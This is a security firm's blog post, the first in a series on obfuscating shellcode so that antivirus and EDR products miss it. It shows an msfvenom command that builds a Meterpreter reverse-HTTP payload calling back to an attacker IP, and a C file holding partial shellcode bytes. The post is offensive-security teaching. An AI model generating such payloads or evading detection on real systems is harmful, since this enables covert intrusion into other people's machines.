Adventures in Shellcode Obfuscation! Part 1: Overview

By Red Siege | June 17, 2024

by Mike Saunders, Principal Security Consultant

This blog is the first in a series of articles on methods for obfuscating shellcode. I’ll be focusing on how to obfuscate shellcode to avoid detection. I won’t be using techniques such as syscalls, unhooking, etc., to evade behavioral detections. The focus will be to show different means of hiding shellcode.

 

What is Shellcode?

The Wikipedia entry for shellcode defines shellcode as such:
In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.

 

Side Note

We could write shellcode by hand, generate Metasploit payloads using msfvenom, or generate shellcode from one of the many available command and control suites like Cobalt Strike, Havoc, Sliver, etc. For this series, I’ll be using msfvenom to generate a windows/x64/meterpreter/reverse_http payload.
To ensure any detection (or lack thereof) is only the result of the shellcode or obfuscation technique, I won’t be writing a full loader. All my example programs will do is reconstruct the shellcode back to its original form and spit out the array so we can compare the reconstructed shellcode with the original shellcode bytes.
For my demonstrations, I’ll be developing payloads on a Windows 10 Professional 22H2 system with Windows Defender. I’ll be compiling the example programs using Visual Studio 2019 and cl.exe from the x64 Native Tools Command Prompt. I’ll be using ThreatCheck to demonstrate whether a payload is detected by Defender. I’ll also upload these examples to VirusTotal to see how they fare against a variety of AV & EDR engines.

 

Why We Hide

If you’re using msfvenom or a well-known C2 to generate shellcode, the chances are you’re going to get detected by pretty much any modern AV or EDR. Consider the following C program. It has shellcode stored in a variable and it prints out a message. It doesn’t use the shellcode in any way.

#include <windows.h>
#include <stdio.h>


// compile: cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcnoobfuscation.c /link /out:noobfuscation.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
// msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.190.134 LPORT=80 -f csharp | tr -d \\n
unsigned char shellcode[563] = {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,
...trimmed...
0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5};


int main(void)
{
printf("All this program does is store shellcode and print this message.\n");
}

 

If we build this program and scan it with ThreatCheck, we can see Defender is definitely detecting our shellcode. If you look at the highlighted bytes, you’ll see they match up with the last few bytes of our shellcode variable.

 

Meterpreter Detected

 

VirusTotal shows 23 of 73 vendors detected this as some kind of malware. This definitely seems low, but because I never actually used the shellcode, vendors who focus on behavioral analysis may not detect this program as malicious.

 

VirusTotal Detection

Modifying the program to load and execute the shellcode shows a few more vendors detected the program – 27 of 72.

VirusTotal Detection

 

Until Next Time

At this point, it should be obvious why we need obfuscate our shellcode.  We want our loaders to have a chance. If we don’t protect our shellcode, it’s likely our payload is going to get blown up the second it touches our target system. In the rest of the series, we’re going to look at different means of obfuscating shellcode that can help us get our payloads to our target without getting detected.

 

Try it Yourself

If you’d like to follow along with this series, you can find the code for these articles on the Red Siege GitHub.

About Principal Security Consultant Mike Saunders

Mike Saunders is Red Siege Information Security’s Principal Consultant. Mike has over 25 years of IT and security expertise, having worked in the ISP, banking, insurance, and agriculture businesses. Mike gained knowledge in a range of roles throughout his career, including system and network administration, development, and security architecture. Mike is a highly regarded and experienced international speaker with notable cybersecurity talks at conferences such as DerbyCon, Circle City Con, SANS Enterprise Summit, and NorthSec, in addition to having more than a decade of experience as a penetration tester. You can find Mike’s in-depth technical blogs and tool releases online and learn from his several offensive and defensive-focused SiegeCasts. He has been a member of the NCCCDC Red Team on several occasions and is the Lead Red Team Operator for Red Siege Information Security.

Certifications:
GCIH, GPEN, GWAPT, GMOB, CISSP, and OSCP

Connect on Twitter & LinkedIn

Adventures in Shellcode Obfuscation! Part 4: RC4 with a Twist

By Red Siege | July 8, 2024

by Mike Saunders, Principal Security Consultant This blog is the fourth in a series of blogs on obfuscation techniques for hiding shellcode. You can find the rest of the series […]

Learn More
Adventures in Shellcode Obfuscation! Part 4: RC4 with a Twist

Adventures in Shellcode Obfuscation! Part 3: Encryption

By Red Siege | July 1, 2024

By Mike Saunders, Principal Security Consultant   This blog is the third in a series of blogs on obfuscation techniques for hiding shellcode. You can find the rest of the […]

Learn More
Adventures in Shellcode Obfuscation! Part 3: Encryption

Phone Switch Labs CTF – Walk-Through

By Red Siege | June 26, 2024

by Douglas Berdeaux, Senior Security Consultant CTF redsiege.com/phoneswitch Getting Started Phone phreaking is the practice of exploring and hacking telephones, telephone switches, telephone test equipment, and physically exploring the telephone […]

Learn More
Phone Switch Labs CTF – Walk-Through

Find Out What’s Next

Stay in the loop with our upcoming events.